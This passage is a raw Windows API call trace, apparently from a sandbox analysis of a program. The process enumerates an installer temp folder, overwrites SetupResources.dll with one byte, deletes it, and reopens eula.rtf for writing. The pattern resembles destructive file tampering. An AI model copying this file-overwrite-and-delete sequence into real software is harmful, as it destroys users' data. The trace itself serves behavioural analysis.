hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0062.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0062.189] CloseHandle (hObject=0x428) returned 1 [0062.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0062.190] CloseHandle (hObject=0x420) returned 1 [0062.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0062.190] AreFileApisANSI () returned 1 [0062.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0062.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0062.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 46 [0062.191] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0062.191] GetFileType (hFile=0x420) returned 0x1 [0062.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0062.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0062.192] GetLastError () returned 0xb7 [0062.192] SetLastError (dwErrCode=0xb7) [0062.192] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0062.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0062.193] CloseHandle (hObject=0x420) returned 1 [0062.193] AreFileApisANSI () returned 1 [0062.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0062.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0062.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 46 [0062.193] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll")) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0062.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0062.195] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.195] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.195] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x6f7, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="̮", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧舐\x07̧비聐葐\x08賂̧")) returned 0 [0062.195] FindClose (in: hFindFile=0x78210 | out: hFindFile=0x78210) returned 1 [0062.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0062.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0062.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0062.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0062.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0062.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0062.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0062.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0062.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0062.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0062.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0062.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0062.196] AreFileApisANSI () returned 1 [0062.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1031", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1031", lpUsedDefaultChar=0x0) returned 27 [0062.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0062.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0062.196] AreFileApisANSI () returned 1 [0062.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0062.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78190 [0062.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x78190, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031") returned 27 [0062.196] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031" (normalized: "c:\\588bce7c90097ed212\\1031"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0062.196] GetLastError () returned 0x5 [0062.196] GetLastError () returned 0x5 [0062.196] SetLastError (dwErrCode=0x5) [0062.196] GetLastError () returned 0x5 [0062.196] SetLastError (dwErrCode=0x5) [0062.196] GetLastError () returned 0x5 [0062.196] SetLastError (dwErrCode=0x5) [0062.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78190 | out: hHeap=0x20000) returned 1 [0062.197] AreFileApisANSI () returned 1 [0062.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0062.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78090 [0062.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x78090, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031") returned 27 [0062.197] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031" (normalized: "c:\\588bce7c90097ed212\\1031"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0062.197] GetLastError () returned 0x5 [0062.197] GetLastError () returned 0x5 [0062.197] SetLastError (dwErrCode=0x5) [0062.197] GetLastError () returned 0x5 [0062.197] SetLastError (dwErrCode=0x5) [0062.197] GetLastError () returned 0x5 [0062.197] SetLastError (dwErrCode=0x5) [0062.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78090 | out: hHeap=0x20000) returned 1 [0062.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0062.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0062.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.197] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0062.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0062.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0062.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0062.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0062.197] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1032", cAlternateFileName="")) returned 1 [0062.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0062.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0062.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0062.198] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x782d0 [0062.198] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.198] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x715b8 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0062.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0062.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0062.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0062.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.199] AreFileApisANSI () returned 1 [0062.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1031\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1031\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0062.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0062.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0062.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0062.199] AreFileApisANSI () returned 1 [0062.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0062.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0062.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 36 [0062.199] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0062.199] GetFileType (hFile=0x420) returned 0x1 [0062.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0062.199] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0062.200] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0062.200] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0062.200] CloseHandle (hObject=0x420) returned 1 [0062.200] AreFileApisANSI () returned 1 [0062.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0062.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69490 [0062.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 36 [0062.200] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0062.200] GetFileType (hFile=0x420) returned 0x1 [0062.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0062.200] CloseHandle (hObject=0x420) returned 1 [0062.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, 